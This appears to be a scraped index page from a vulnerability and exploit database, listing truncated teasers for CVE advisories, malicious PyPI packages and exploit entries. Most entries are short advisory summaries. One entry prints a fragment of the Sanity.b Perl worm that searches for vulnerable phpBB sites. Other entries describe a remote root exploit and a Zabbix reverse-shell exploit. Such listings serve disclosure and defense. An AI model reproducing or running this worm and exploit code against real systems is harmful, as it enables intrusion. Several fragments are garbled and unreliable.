EUVD-2006-5496

Malware in sbrugna...

EUVD-2023-23940

Malicious code in bioql PyPI...

CVE-2025-52723 WordPress Networker theme <= 1.2.0 - Local File Inclusion Vulnerability

Improper Control of Filename for Include/Require Statement in PHP Program 'PHP Remote File Inclusion' vulnerability in codesupplyco Networker networker allows PHP Local File Inclusion.This issue affects Networker: from n/a through = 1.2.0...

WordPress Aora plugin file inclusion vulnerability

WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress plugin is an application plugin. A file inclusion vulnerability exists in WordPress Aora plugin, which stems from improper control of filenames for include or demand statements, and can be exploited by an...

WordPress Blogmine plugin file inclusion vulnerability

WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress plugin is an application plugin. A file inclusion vulnerability exists in the WordPress Blogmine plugin that stems from improper filename control and can be exploited by an attacker to cause PHP native file...

CVE-2025-6126 PHPGurukul Rail Pass Management System contact.php cross site scripting

A vulnerability was found in PHPGurukul Rail Pass Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /contact.php. The manipulation of the argument Name leads to cross site scripting. The attack can be launched...

CVE-2025-48126 WordPress Essential Real Estate plugin <= 5.2.9 - Local File Inclusion vulnerability

Improper Control of Filename for Include/Require Statement in PHP Program 'PHP Remote File Inclusion' vulnerability in g5theme Essential Real Estate essential-real-estate allows PHP Local File Inclusion.This issue affects Essential Real Estate: from n/a through = 5.2.9...

CVE-2018-11686

The Publish Service in FlexPaper later renamed FlowPaper 2.3.6 allows remote code execution via setup.php and changeconfig.php...

Apache ActiveMQ 5.3.2 Source Code Disclosure

Apache ActiveMQ version 5.3.2 source code disclosure proof of concept exploit that demonstrates an issue discovered in 2010. ============================================================================================================================================= | Title : Apache ActiveMQ 5.3....

CVE-2025-2035 s-a-zhd Ecommerce-Website-using-PHP customer_register.php unrestricted upload

A vulnerability was found in s-a-zhd Ecommerce-Website-using-PHP 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /customerregister.php. The manipulation of the argument name leads to unrestricted upload. The attack may be launched remotely. The...

Zabbix 7.0.1rc1 Remote Code Execution

Zabbix server version 7.0.1rc1 remote code execution exploit that provides a reverse shell. ============================================================================================================================================= | Title : Zabbix server v 7.0.1rc1 PHP Code Injection...

Linux Distros Unpatched Vulnerability : CVE-2011-4718

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Session fixation vulnerability in the Sessions subsystem in PHP before 5.5.2 allows remote attackers to hijack web sessions by specifying a session ID...

PHP 4.4.6 - &#039;mssql_[p]connect()&#039; Local Buffer Overflow

milw0rm.com 2007-03-05...

By PHP v4. 0. 2rc1-v4. 0. 7RC2 Trojan program to get the root-vulnerability warning-the black bar safety net

From one is black on the server to find the following tool fun This tool is designed to scan PHP v4. 0. 2rc1-v4. 0. 7RC2 / exploit program. Find the post by the overflow remotely get a shell, get root permissions is even simpler. Usage is as follows: root@linuxserver tmp ./ fun 7350fun - x86/linu...

Sanity.b - phpBB 2.0.10 Bot Install (AOL/Yahoo Search)

/usr/bin/perl use IO::Socket; use LWP::Simple; @vul = ""; $a=0; $numero = int rand999; $site = "search.aol.com"; $procura = "viewtopic.php%3Ft%3D$numero"; for$n=0;$nnewPeerAddr="$site",PeerPort="80",Proto="tcp" or next; print $sock "GET /aolcom/search?q=$procura&Stage=0&page=$n HTTP/1.0\n\n"; @re...

SAME LADY, DIFFERENT DRESS: Internet Explorer 6

Monday, August 12, 2002 Yet another silent delivery and installation of an executable on the target computer using Internet Exlorer 6. This can be achieved by reversing the following: http://online.securityfocus.com/bid/5350 And: HTM. In order to to achieve the required results as outlined in the...

IcrediBB 1.1 - Script Injection

IcrediBB 1.1 - Script Injection source: https://www.securityfocus.com/bid/4548/info IcrediBB is freely available web forum software. It is written in PHP and will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. IcrediBB does not adequately filter script code...